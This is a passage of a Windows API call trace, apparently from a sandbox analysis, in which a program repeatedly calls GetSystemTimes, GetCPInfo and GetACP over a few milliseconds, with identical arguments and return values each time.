GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.845] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.846] GetACP () returned 0x4e4 [0117.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.847] GetACP () returned 0x4e4 [0117.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.848] GetACP () returned 0x4e4 [0117.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.849] GetACP () returned 0x4e4 [0117.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.850] GetACP () returned 0x4e4 [0117.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.850] GetACP () returned 0x4e4 [0117.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.850] GetACP () returned 0x4e4 [0117.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.852] GetACP () returned 0x4e4 [0117.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.853] GetACP () returned 0x4e4 [0117.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.854] GetACP () returned 0x4e4 [0117.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.855] GetACP () returned 0x4e4 [0117.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.856] GetACP () returned 0x4e4 [0117.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) 